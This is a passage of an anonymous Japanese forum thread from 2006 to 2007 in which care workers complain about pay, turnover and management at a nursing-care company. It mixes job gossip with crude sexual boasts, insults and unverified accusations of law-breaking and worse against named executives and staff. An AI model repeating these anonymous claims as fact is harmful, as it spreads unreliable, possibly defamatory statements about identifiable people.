うちらなんて、Sルームで♂♀やっちゃったよ!    夜勤サイコー☆

345 :ななしのフクちゃん:2006/09/12(火) 00:12:09 ID:2j8dGghD
343=344
親が泣いているよ。

346 :ななしのフクちゃん:2006/09/13(水) 02:57:19 ID:PEVCW/pI
うちの母はユニクロで買い物するのが好きだった。

若くして夫を亡くし、女手一つで3人兄弟を大学までいかせてくれた。
朝は新聞配達所の食事作り、それが終わると深夜まで料亭の洗い場で働いていた。
真冬の雪の中も休む事無く,あかぎれた手で自転車をこいで仕事に出かけていた。
そんな母を初めてユニクロに連れていったのはつい去年だった。
男だとわかると思うが、ある年齢になると母親と買い物に出かけたりするのは
恥ずかしくて出来なくなるものだ。
そんな気持ちが無くなったのも自分が歳をとったからだろうか(笑)
母は数十年振りの親子での買い物を喜んでくれたようで、子供のようにはしゃいでいた。
それから休日にはよく車でユニクロに買い物に行った。
「これは孫の健太に似合いそう」とか言いながら
特価日には「このトレーナーは(弟)に似合う」とかいろいろ買込んでいた。弟の嫁の分まで買っていた。
でも自分の分は一着も買っていなかった。
「自分はあるから・・・」と何年も同じ服着回していた。 そんな母だった。

そんな母が先月亡くなった。急だった。

ユニクロは自分にとって思い出の場所です。


347 :ななしのフクちゃん:2006/09/13(水) 15:48:04 ID:ZUanKjIs
夕べは忙しかったから階段の踊り場でした

348 :ななしのフクちゃん:2006/09/13(水) 23:43:27 ID:rMEIAbyl
若いっていいよね。
ここはブー夫しかいないと思ってた、いい男がいるなら紹介して欲しいモノだ。
それともモノ好きか?

349 :ななしのフクちゃん:2006/09/14(木) 09:17:58 ID:qYkMbbp0
色気のない女どもに紹介するぐらいなら私が食うょw

350 :ななしのフクちゃん:2006/09/16(土) 13:00:50 ID:/ngatJRR
ホーム長が呼び出されて営業周りさせられるってありえなくね?

351 :ななしのフクちゃん:2006/09/17(日) 00:42:52 ID:8jiWDvEH
        /:::::^::::::::::`丶
       /:::::::::::::::::::::::::::::::::|
       |::::/从从从从从::|
        |:|       , ヽ|   
         |ノ  ━    ━   ||
      (|  -=・-, -・=- .lノ      
       |    (,,,_,,,)ヽ  |
         |  /::: ll :: :ヽ |
         \  ー===- /
            |丶 ::::::::::: ノ|ヽ
        /|   ̄ ̄ . |:::::\
      /\丶     / |:::::::ヽ
    /::::::  | \ o/ / 人:::::::::ゝ



352 :ななしのフクちゃん:2006/09/19(火) 22:13:10 ID:EES7uee2
あーあ  ほんと くだらない職員ばかり居る所なんだな
転職考えたけど、他社に 決めた!

353 :ななしのフクちゃん:2006/09/21(木) 15:50:09 ID:sf9FBbXe
他社への転職かしこいね。            本当に実力あるなら他社へいくべき。                   ここはバカも能無しも実力者も評価同じだから。

354 :ななしのフクちゃん:2006/09/21(木) 16:00:34 ID:F+m+L7Ib
あたしはラブホ代わりに使ってるので助かってます

355 :ななしのフクちゃん:2006/09/21(木) 20:27:24 ID:1Ehw2C6U
フィリピン看護師と介護士派遣の需要は物凄そうだなw
そろそろ外人派遣専門会社でも立ち上げておくかな

356 :ななしのフクちゃん:2006/09/21(木) 20:59:36 ID:sf9FBbXe
今、テレ玉でCM流れてた。            金の使い道間違ってるし、CM観て問い合わせる人いたら不幸だ。                   公共電波まで使うとはいよいよ表に犯罪ぶちまけてるね〜

357 :ななしのフクちゃん:2006/09/24(日) 11:31:19 ID:UzTBcs5X
実習でグループホーム見せてもらったよ
たいしたレクもせず危ないからってホールに集めてまったりさせてる
他の施設ならもっと長生きできるんだろうな・・・

358 :ななしのフクちゃん:2006/09/24(日) 20:20:19 ID:ZOf04Iu+
356は、ラジオでもCMしてるのはご存じ?
一度は見て見たいと思いますが…
           まじめな社員もいるし、変なのもいるのは、どこでも同じ事じゃない?
男でなく、楽に働こうと思ってるなら、条件はかなりいいと思いません?ウイズで働いてる彼氏・旦那持ちなら生活が超〜キビシイよ、哀れだと思います。


359 :ななしのフクちゃん:2006/09/24(日) 23:28:01 ID:hRz9T5ni
w

360 :ななしのフクちゃん:2006/09/25(月) 17:39:55 ID:5QCrEo+j
負け組

361 :ななしのフクちゃん:2006/09/25(月) 18:14:14 ID:4w4kL+vK
介護やってる自体負け組

362 :ななしのフクちゃん:2006/09/25(月) 19:38:37 ID:lEiMQROo


363 :ななしのフクちゃん:2006/10/01(日) 04:21:21 ID:V8YVVpUK
足立の復習

364 :ななしのフクちゃん:2006/10/04(水) 20:50:33 ID:DV/d8vQG
かなりヤバいことになってるよ!
http://newsheadline.tripod.com/entertain/san-ent-20061003-000000127.html

365 :ななしのフクちゃん:2006/10/10(火) 00:39:50 ID:ad+xc7hL
343 344 どこのホームかな。

366 :ななしのフクちゃん:2006/10/10(火) 00:40:31 ID:ad+xc7hL
343 344 どこのホームかな。

367 :ななしのフクちゃん:2006/10/14(土) 12:26:33 ID:PVCywFK/
レベルが低い・・・しつこくFAX営業するな!!
すぐ捨ててるよ〜 興味なし 
噂は聞いてたけど ここまで酷いとは・・・
又他業者のケアマネに情報流そうっと!

もう 終わりだよ〜

368 :ななしのフクちゃん:2006/10/16(月) 20:06:22 ID:pPG8aM5O
364なにがヤバイのですか?

産休・育休が、この会社ちゃんと取れるの?
取った人いるの、復帰した人いるの?誰か教えて下さい。

369 :ななしのフクちゃん:2006/10/19(木) 01:11:52 ID:Z0OMIIIU
>>368
いません。

370 :ななしのフクちゃん:2006/10/22(日) 22:29:46 ID:EOKc2zdV
365てめーは本社の人間か?ただの馬鹿か?そんなん言うわけないやろ。別々な事だけは確かだけどな

371 :ななしのフクちゃん:2006/10/22(日) 22:32:41 ID:EOKc2zdV
介護を負け組とかいってるくそったれ。介護の仕事が負け組じゃねえ。ウィズネットいることが負け犬以下だ。

372 :ななしのフクちゃん:2006/10/22(日) 22:57:49 ID:EOKc2zdV
Re:370 そんなんが横行してて、対処も調査もできてない?会社、上層部ってどうなのかな?

373 :ななしのフクちゃん:2006/10/25(水) 01:09:12 ID:CVdEC5T9
本社は代表と常務のイエスマンしかいません。
そうでない人は辞めるか辞めさせられています。


374 :ななしのフクちゃん:2006/10/26(木) 15:58:09 ID:1Ekf/ZI2
北朝鮮企業。福祉のド素人企業のくせに、分析力、学習力ゼロ企業。絶対に安心して家族を預けられない企業。

375 :ななしのフクちゃん:2006/10/28(土) 17:16:16 ID:9w0bObXz
離職率高すぎ。採用も多いけど。

376 :ななしのフクちゃん:2006/10/31(火) 13:18:18 ID:r5cJFMuK
正気の人は離職します。離職率高いのは、企業としても魅力ないから。採用は常に監査にひっかかる人員配置だから。監査の度に適当に人を移しぎりぎり乗り越えるひどい会社。

377 :ななしのフクちゃん:2006/10/31(火) 13:24:58 ID:r5cJFMuK
福利厚生は死語の会社。休憩も社会保障も監査上の就業規則の紙切れの上だけのもの。採用は多いと捉えるのは間違い。勤務中昼寝する学生を平気でとる履歴書かければ誰でもとるから。

378 :ななしのフクちゃん:2006/10/31(火) 15:19:21 ID:r5cJFMuK
無責任な事業拡大、展開ばかり。スペシャリストなくして。責任感という言葉は高橋ユキノリの頭にはないのではないだろうか?

379 :ななしのフクちゃん:2006/11/01(水) 00:09:56 ID:6k99WcIB
>>378
たぶん、全く無いよ。


380 :ななしのフクちゃん:2006/11/01(水) 10:30:05 ID:k+5Gyr58
高橋代表は現場を知らなさすぎ。じゃあ経営手腕は?と考えたとき、三流の腕前。もう少し社会に迷惑かけない身の丈経営をしなさい。馬鹿ばかり側近にするな、アホがぁ!

381 :ななしのフクちゃん:2006/11/01(水) 14:18:40 ID:6IaiWE7w
なんだかんだ言っても高橋将軍は勝ち組だよ。

382 :ななしのフクちゃん:2006/11/01(水) 16:01:00 ID:k+5Gyr58
適当な事して勝ち組にはなりたくないな。人として。

383 :ななしのフクちゃん:2006/11/03(金) 18:36:37 ID:lafIRKNT
グループホームの管理者してましたが九月いっぱいで退社しました。

384 :ななしのフクちゃん:2006/11/03(金) 21:10:20 ID:SBAO8wY3
勿体ない、ボーナスが出てから辞めればよかったのに。少ないと言え無いよりいいでしょ。

385 :ななしのフクちゃん:2006/11/05(日) 08:35:33 ID:MWNP/W2j
関わりたくないよ。頭がおかしい。

386 :ななしのフクちゃん:2006/11/08(水) 18:32:12 ID:mN/8TiLs
こずかいにもならないボーナス捨ててでも辞めたい会社だよね〜早くよそ行ったほうが得策。

387 :ななしのフクちゃん:2006/11/09(木) 18:36:26 ID:8k9g9kb1
会社にしばりついてる人の声が聞きたいな

388 :ななしのフクちゃん:2006/11/14(火) 23:03:25 ID:dVnEQPeM
フロア長、ホーム長、管理者、(名前だけの)バイザーいるのに、やめた私のとこにスタッフが業務内容の相談に来る会社って…

389 :ななしのフクちゃん:2006/11/16(木) 18:45:29 ID:AnIl2Rsd
ボーナスの話でてたけどグループホームのホーム長で10万ちょっとみたいですよ

390 :ななしのフクちゃん:2006/11/18(土) 09:20:50 ID:nK3Uz/2/
ひえ〜 安すぎ!!
夏と冬合わせても 4ヶ月分貰えるけどね・・・(70万確実)

かわいそすぎ!!

391 :ななしのフクちゃん:2006/11/20(月) 01:44:52 ID:/l799JFH
↑どこですか?

392 :ななしのフクちゃん:2006/11/23(木) 02:09:55 ID:+xKEQelB
どことか聞いてばっかwww

393 :ななしのフクちゃん:2006/11/24(金) 14:03:55 ID:8MuU1ZlV
○成www

394 :ななしのフクちゃん:2006/11/25(土) 16:25:44 ID:hTzaSS0M
ってか、福祉法人・病院関係だったら5.5か月は当然じぁない?
そんなことも知らないの

395 :ななしのフクちゃん:2006/11/27(月) 17:12:53 ID:QBpGXtQS
↑今は結構不景気みたいですよ 393は?

396 :ななしのフクちゃん:2006/12/04(月) 23:18:23 ID:sAKAqoIc
デイ職員丸1年になりました
利用者からは食事が他のデイより冷凍食品ばっかでマズいと好評ですね!
調理士免許を持ってない人が大半ってのもビックリです
そろそろGHに引っ越したいなぁ
夜勤も3時間おきの巡視でオムツ交換以外は寝てられるそうですし

397 :ななしのフクちゃん:2006/12/15(金) 23:59:21 ID:TnXCuCqv
♪ボ〜ナス♪・♪ボ〜ナス♪

398 :ななしのフクちゃん:2006/12/17(日) 00:26:37 ID:sx8uajlb
ボーナスって言っても一丁前に5段階に職員を評価してる(好き嫌いの根拠で)。
明らかに事故報告まみれの不適格者が、なんと、評価高いの不思議!
もっとも最高評価で1.2ヶ月って子供の小遣いか?
おまけに施設長は労災を知らないバカ長だって。
入室者の家族が話を合わせてくれているのに、得意になって中身のない話をしてるんだって。
ハズカスィネー
だから社員も社員で二十歳の小娘が得意になって入室者を説教してるんだって、怪我したって隠しまくりみたいよオソロシー

399 :ななしのフクちゃん:2006/12/24(日) 22:22:34 ID:H4lvDDrq
ここのデイに面接しようかまよってるんだが、初心者にはちゃんと指導してくれるの?
それともほったらかし?ここのレス見る限りでは就職しない方がいいのか?

400 :ななしのフクちゃん:2006/12/26(火) 00:09:08 ID:MMha1nJb
迷う必要はない 他行け

401 :ななしのフクちゃん:2006/12/26(火) 07:12:01 ID:q1SairJA
常務どの、ケアマネ試験どうでした?

402 :ななしのフクちゃん:2006/12/26(火) 23:22:19 ID:4TxRIAe2
>>399
福祉の4大卒が就職後すぐやめちゃう会社なんだってサー
わかるでしょ????会社に希望が見えないみたい
ただいそがしいだけで ほんとに何にもない会社みたいヨ


403 :ななしのフクちゃん:2006/12/29(金) 20:30:53 ID:brkPCiBm
確かに・・・
会社に夢もない!会社にモチベーションもない!会社に福利厚生もない!現場に更衣室もない!
現場職員の女性用トイレもない!昇給もない!昇進のポストもない!
おまけに退職金もない!
だんだんウザクなってきた
退職した先輩の気持ちがだんだんわかってきたヨ

404 :ななしのフクちゃん:2007/01/02(火) 22:20:55 ID:qxgl7DND
おい山田あけおめ

405 :ななしのフクちゃん:2007/01/07(日) 23:16:47 ID:UF2+NM8/
>>403
夢も希望も将来もないってこと??
そんな会社が福祉?介護?
じゃ、利用者の将来の自立は語れないよね?
それってかなり無理ー
ケアプランどんな顔してキーマンの了承を得ているの????
うそ?たてまえ?うわっつらー?
つまり社内からクライアントまでにウソを振りまいてるわけ??
うちは規模小さいけど施設長は結構りっぱだヨ
単純なことが全然理解できてないんだねーその施設!
それって、経営者素人だよね?どんな人が経営してるんだろー???

406 :ななしのフクちゃん:2007/01/08(月) 00:59:09 ID:yT16drgk
おい家田あけおめ
あんたはひどいんだってー?
施設長時代、さんざん法律違反をやってたんだってねー
あんたのヒステリー庄屋で聞いてるよー
泣いた社員が沢山だそうですねー、会社は高い金を使って募集してるのに
ヒステリ-で陰湿で指導力が無くて、で今なんかの講座を本社でもってる?
法律違反をやってたあんたが何を教えてるんですか?純情な新人社員に?
現場に出しておけないと、会社が判断して本社に引き上げたのならば、ある程度良識を持った会社だと思うが、
会社の言いなりになって可愛い奴だと上司が思って本社に抜擢したのなら本当にクソの集団なんだねー
話を聞くと同業として泣けてくるねー  早くやめちゃいなって言っといたよ ほんと

407 :ななしのフクちゃん:2007/01/10(水) 19:17:19 ID:KjqClb3E
おいMAC YMD おけおめことよろ??
そっちの売り子さんたちはうまく育ってるかい?
相変わらず歩留まりは1.8くらいかい?
おまえのハイヤリングじゃどうせみんなやめちゃうんだろう?
今度は子供を卒業して介護だって?
ジジイババアに春でも売らしてるんかい?

408 :ななしのフクちゃん:2007/01/17(水) 16:01:32 ID:lgDtN2l5
悪い事はいわない。ウィスネットに就職はやめなさい。時間の無駄、給料はこずかい、会社のビジョンなし、学ぶことなし。OBより

409 :ななしのフクちゃん:2007/01/18(木) 16:10:59 ID:3oRgoskQ
北朝鮮企業のウィスネット、世間知らずの高橋一家にMAC出身YMDさんが牛耳る。いい会社な訳ないじゃん。介護福祉士の試験後に退職者続出間違いないよ。

410 :ななしのフクちゃん:2007/01/18(木) 23:41:40 ID:ctdbADfU
つーかここで仕事しても資格とれる技量がないわなw

411 :ななしのフクちゃん:2007/01/20(土) 01:40:13 ID:cHYb/KAa
何で現場の給料ってあんなに安いんだ?他はまだマシなのにね

412 :ななしのフクちゃん:2007/01/21(日) 16:24:51 ID:DE/k3YAD
あんまり大差ないよ

68 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)